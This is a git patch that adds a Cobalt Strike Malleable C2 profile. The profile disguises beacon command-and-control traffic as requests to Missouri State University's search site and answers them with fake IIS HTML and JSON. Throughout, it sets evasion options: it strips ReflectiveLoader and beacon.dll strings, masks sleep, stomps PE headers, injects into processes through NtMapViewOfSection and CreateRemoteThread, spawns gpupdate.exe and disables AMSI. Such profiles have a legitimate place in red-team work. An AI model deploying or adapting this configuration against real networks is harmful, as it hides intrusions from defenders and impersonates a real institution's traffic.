From e922ce9da8a6153585ab5fcd0dac74c0a64a49e8 Mon Sep 17 00:00:00 2001
From: xx0hcd <xx0hcd@gmail.com>
Date: Thu, 6 Jun 2019 15:50:53 -0500
Subject: [PATCH] Create msu_edu.profile

---
 normal/msu_edu.profile | 302 +++++++++++++++++++++++++++++++++++++++++
 1 file changed, 302 insertions(+)
 create mode 100644 normal/msu_edu.profile

diff --git a/normal/msu_edu.profile b/normal/msu_edu.profile
new file mode 100644
index 0000000..9831d56
--- /dev/null
+++ b/normal/msu_edu.profile
@@ -0,0 +1,302 @@
+#MSU education site profile
+#xx0hcd
+
+###Global Options###
+set sample_name "msu_edu.profile";
+
+set sleeptime "37500";
+set jitter    "33";
+set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36";
+
+#set host_stage "false";
+
+###DNS options###
+set dns_idle "8.8.8.8";
+set maxdns    "245";
+set dns_sleep "0";
+set dns_stager_prepend "";
+set dns_stager_subhost "";
+set dns_max_txt "252";
+set dns_ttl "1";
+
+###SMB options###
+set pipename "ntsvcs";
+set pipename_stager "scerpc";
+
+###TCP options###
+set tcp_port "8000";
+
+###SSL Options###
+#https-certificate {
+    #set keystore "your_store_file.store";
+    #set password "your_store_pass";
+#}
+
+#https-certificate {
+#    set C "US";
+#    set CN "whatever.com";
+#    set L "California";
+#    set O "whatever LLC.";
+#    set OU "local.org";
+#    set ST "CA";
+#   set validity "365";
+#}
+
+#code-signer {
+    #set keystore "your_keystore.jks";
+    #set password "your_password";
+    #set alias "server";
+#}
+
+###HTTP-Config Block###
+http-config {
+    #set headers "Server, Content-Type";
+    #header "Content-Type" "text/html;charset=UTF-8";
+    #header "Server" "nginx";
+
+    set trust_x_forwarded_for "false";
+}
+
+###HTTP-GET Block###
+http-get {
+
+    set uri "/siteindex/a/ /siteindex/b/ /siteindex/c/";
+
+    #set verb "POST";
+    
+    client {
+
+        header "Host" "search.missouristate.edu";
+        header "Accept" "*/*";
+        header "Accept-Language" "en";
+        header "Connection" "close";
+
+	   
+    metadata {
+        #base64
+        base64url;
+        #mask;
+        #netbios;
+        #netbiosu;
+        #prepend "TEST123";
+        #append ".php";
+
+        parameter "filter";
+        #header "Cookie";
+        #uri-append;
+
+        #print;
+    }
+
+    #parameter "test1" "test2";
+    }
+
+    server {
+        header "Cache-Control" "private";
+        header "Content-Type" "text/html; charset=utf-8";
+        header "Vary" "User-Agent";
+        header "Server" "Microsoft-IIS/8.5";
+        header "BackendServer" "Handle";
+        header "X-UA-Compatible" "IE=edge";
+        header "Connection" "close";
+        header "Set-Cookie" "WWW-SERVERID=handle; path=/";
+ 
+        output {
+
+            netbios;
+            #netbiosu;
+            #base64;
+            #base64url;
+            #mask;
+  
+            prepend "    <link href=\"/resource/styles\" media=\"all\" rel=\"stylesheet\" />    <script src=\"https://missouristate.info/scripts/2018/common.js?_q=";
+            prepend "    <meta name=\"robots\" content=\"noindex\" /><link rel=\"Stylesheet\" media=\"all\" href=\"https://missouristate.info/styles/msuwds/main-sgf.css\" />\n";
+            prepend "    <meta name=\"vireport\" content=\"width=device-width, initial-scale=1.0\" />\n";   
+            prepend "    <title>A - Site Index - Missouri State University</title>\n";
+            prepend "    <meta charset=\"UTF-8\" />\n";
+            prepend "<head>";     	       
+	    prepend "<html lang=\"en\" itemscope itemtype=\"https://schema.org/SearchResultsPage\">\n";
+            prepend "<!DOCTYPE html>\n";
+
+	    append "\"></script>\n";
+            append "<h2>About search</h2>\n";
+	    append "<ul>\n";
+	    append "<li><a href=\"https://www.missouristate.edu/web/search/aboutwebsearch.htm\">About web search</a></li>]n";
+	    append "<li><a href=\"https://www.missouristate.edu/web/search/aboutpeoplesearch.htm\">About people search</a></li>\n";
+	    append "<li><a href=\"https://www.missouristate.edu/web/search/abouteventsearch.htm\">About event search</a></li>\n";
+	    append "<li><a href=\"https://www.missouristate.edu/web/search/aboutmapsearch.htm\">About map search</a></li>";
+	    append "</ul>\n";
+	    append "</div>";
+
+            print;
+        }
+    }
+}
+
+###HTTP-Post Block###
+http-post {
+    
+    set uri "/getsearchresults";
+    #set verb "GET";
+    set verb "POST";
+
+    client {
+
+#	header "Host" "search.missouristate.edu";
+	header "Connection" "close";
+        header "Accept" "*/*";
+        header "Accept-Language" "en-US";   
+        
+        output {
+            base64url; 
+	    parameter "site_indexFilter";
+        }
+
+        id {
+	    base64url;
+	    parameter "peopleFilter";
+
+        }
+
+    parameter "eventsFilter" "campus:sgf";
+#    parameter "mapFilter" "campus";
+    parameter "query" "my%20missouri%20state";
+    parameter "resultCounts" "5,3,3,3&";
+
+    }
+
+    server {
+        header "Cache-Control" "private";
+        header "Content-Type" "application/json; charset=utf-8";
+        header "Vary" "User-Agent,AcceptEncoding";
+        header "Server" "Microsoft-IIS/8.5";
+        header "BackendServer" "Handle";
+        header "X-UA-Compatible" "IE=edge";
+        header "Connection" "close";
+
+        output {
+            netbios;	    
+	   
+	    prepend "[\"{\\\"results\\\":[\\\"{\\\\\\\"ID\\\\\\\":\\\\\\\"Missouri State University Foundation\\\\\\\",\\\\\\\"Name\\\\\\\":\\\\\\\"Missouri State University Foundation\\\\\\\",\\\\\\\"Url\\\\\\\":\\\\\\\"https://www.missouristatefoundation.org/\\\\\\\",\\\\\\\"Keywords\\\\\\\":";
+
+	    append "\"\\\\\\\"development; endowment; foundation; Foundation, Missouri State; fundraising; missouri state foundation; missouri state university foundation\\\\\\\",\\\\\\\"UnitType\\\\\\\":\\\\\\\"Department\\\\\\\"}\\\",\\\"{\\\\\\\"ID\\\\\\\":\\\\\\\"Missouri State Outreach\\\\\\\",\\\\\\\"Name\\\\\\\":\\\\\\\"Missouri State Outreach\\\\\\\",\\\\\\\"Url\\\\\\\":\\\\\\\"https://outreach.missouristate.edu/\\\\\\\",\\\\\\\"Keywords\\\\\\\":\\\\\\\"distance learning; dual credit; evening; extended campus; Extended Campus (now Missouri State Outreach); i courses; i-courses; icourses; interactive video; itv; non credit; non-credit; noncredit; off campus; off-campus; offcampus; online; outreach; Outreach, Missouri State\\\\\\\"}\"]";
+
+            print;
+        }
+    }
+}
+
+###HTTP-Stager Block###
+http-stager {
+
+    set uri_x86 "/Events";
+    set uri_x64 "/events";
+
+    client {
+        header "Host" "search.missouristate.com";
+        header "Accept" "*/*";
+        header "Accept-Language" "en";
+        header "Connection" "close";
+
+        #parameter "test1" "test2";
+    }
+
+    server {
+        header "Cache-Control" "private";
+        header "Content-Type" "private";
+        header "Vary" "User-Agent";
+        header "Server" "Microsoft-IIS/8.5";
+        header "BackendServer" "Handle";
+        header "X-UA-Compatible" "IE=edge";
+        header "Connection" "close";
+        header "Set-Cookie" "WWW-SERVERID=handle; path=/";  
+
+        output {
+        
+            #prepend "content=";
+
+            #append "</script>\n";
+            print;
+        }  
+
+    }
+}
+
+
+###Malleable PE/Stage Block###
+stage {
+    set checksum        "0";
+    set compile_time    "23 Nov 2018 02:25:37";
+    set entry_point     "170000";
+    #set image_size_x86 "6586368";
+    #set image_size_x64 "6586368";
+    #set name	        "WWanMM.dll";
+    set userwx 	        "false";
+    set cleanup	        "true";
+    set sleep_mask	"true";
+    set stomppe	        "true";
+    set obfuscate	"true";
+    set rich_header     "";
+    
+    set sleep_mask "true";
+
+    set module_x86 "wwanmm.dll";
+    set module_x64 "wwanmm.dll";
+
+    transform-x86 {
+        prepend "\x90\x90\x90";
+        strrep "ReflectiveLoader" "";
+        strrep "beacon.dll" "";
+        }
+
+    transform-x64 {
+        prepend "\x90\x90\x90";
+        strrep "ReflectiveLoader" "";
+        strrep "beacon.x64.dll" "";
+        }
+
+    #string "something";
+    #data "something";
+    #stringw "something"; 
+}
+
+###Process Inject Block###
+process-inject {
+
+    set allocator "NtMapViewOfSection";		
+
+    set min_alloc "16700";
+
+    set userwx "false";  
+    
+    set startrwx "false";
+        
+    transform-x86 {
+        prepend "\x90\x90\x90";
+    }
+    transform-x64 {
+        prepend "\x90\x90\x90";
+    }
+
+    execute {
+        CreateThread "ntdll!RtlUserThreadStart";
+        CreateThread;
+        NtQueueApcThread;
+        CreateRemoteThread;
+        RtlCreateUserThread;
+    }
+}
+
+###Post-Ex Block###
+post-ex {
+
+    set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
+    set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
+
+    set obfuscate "true";
+
+    set smartinject "true";
+
+    set amsi_disable "true";
+
+}